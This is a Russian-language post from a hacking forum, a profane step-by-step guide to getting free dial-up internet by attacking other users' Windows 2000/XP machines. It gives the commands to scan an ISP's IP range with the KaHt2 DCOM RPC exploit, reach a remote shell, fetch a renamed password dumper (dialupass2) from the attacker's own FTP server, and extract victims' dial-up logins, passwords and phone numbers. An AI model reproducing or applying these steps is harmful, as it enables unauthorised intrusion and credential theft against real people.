Форум для диверсантов

Информация о пользователе

Привет, Гость! Войдите или зарегистрируйтесь.

Вы здесь » Форум для диверсантов » Хакинг » ВЗЛОМ

ВЗЛОМ

Сообщений 1 страница 2 из 2

1

Вообсчем хотите халявный инет? Ггг халява тока в мышилоффке!! Так вот. Мы (то есть я) будем (буду) мутить халявный инет через диалап. Вопсчем своих провов я не напишу (больше сосок - хуже связь (с)). Но это можно использовать и на других провах, где юзаются 2к или ХРюши у юзверей.
 Так. Нам нужно:
 1) KaHt2 (10.5кб) (это эксплоит такой) - главная вещь, которая нам потребуется.
 2) dialupass2 - нужно чтобы достать пароли.
 3) Любой ftp сервер. Нужен чтобы передать dialupass2 на удалённую машину. Ищите, где хотите.(автор рекомендует Яndex).
 Такс. :) Первая часть :)
 Узнаём ip диапазоны своего прова. Простейший способ - после подключения нажать 2 раза на этих 2-х компутирах и в закладке сведения посмотреть ip-адрес клиента (тобишь ваш ip) диапазоны типа от 1 до 254 и может и на уровень выше так же. У всех по разному.
 Создаём папку c:/kaht и кладём туда KaHt2.exe
 Запускаем командную строку вводим C:\kaht\KaHt2.exe 121.11.11.1 121.11.11.254 где 121.11.11.1 и 121.11.11.254 диапазон для сканирования. Он может быть любым. Хоть весь инет сканьте. Мне похуй! :)
 Кароче жмём ЕнтЕр :)
 ЖДём, если повезёт и на этом диапазоне попадутся уязвимые компы (используется уязвимость в DCOM RPC), то появится просто строчка C:\WINDOWS\System32\ только проверьте, что это не ваш комп :)). Вообщем набираем "cd .." и так несколько раз (дебил, без кавычек набирай, и рот закрой) пока не попадём в корень диска C:
 2 часть. Нахуй! :)
 запускаем фтп. создаём пользователя allinet и ПУСТОЙ парль! (не спрашивайте почему так, вы всё-равно не поймёте - фишка в банке (с)) И кладёте в папку фтп сервера (которую в настройках указали - тока не спрашивайте как фтп настраивать - пшли НАХУЙ, все вопросы к администраторам ЭТОГО сайта) dialupass2.exe НО!!! не забудьте переименовать этот файлик во что-то типа z.exe :) Если много сканить будете поймёте :)) Такие файлики много у кого остаются :)) вообщем в КаХте вводим ftp ip-адрес(ваш) жмём ентер. появится типа введите логин. вводим allinet и жмём ЕНТЕР! Всё. тихо, спокойно!! +))
 дальше набираем
 get z.exe c:/z.exe (если не получится, гляньте там хелп по этому типа)
 запускаем z.exe /allusers /shtml "c:dialup.html"
 создасться файлик dialup.html
 набираем more dialup.html
 и в этом ХТМЛ файле ищем имя соединения логин и пароль и телефон. всё.
 также если глянуть в параметрах, то можно и текстовые файлы создавать..
 А теперь пашли все нахуй!!!!!!!!! (от админа : "последнее лишнее, но что делать ?! авторство не нарушишь !")

0

2

Вы здесь » Форум для диверсантов » Хакинг » ВЗЛОМ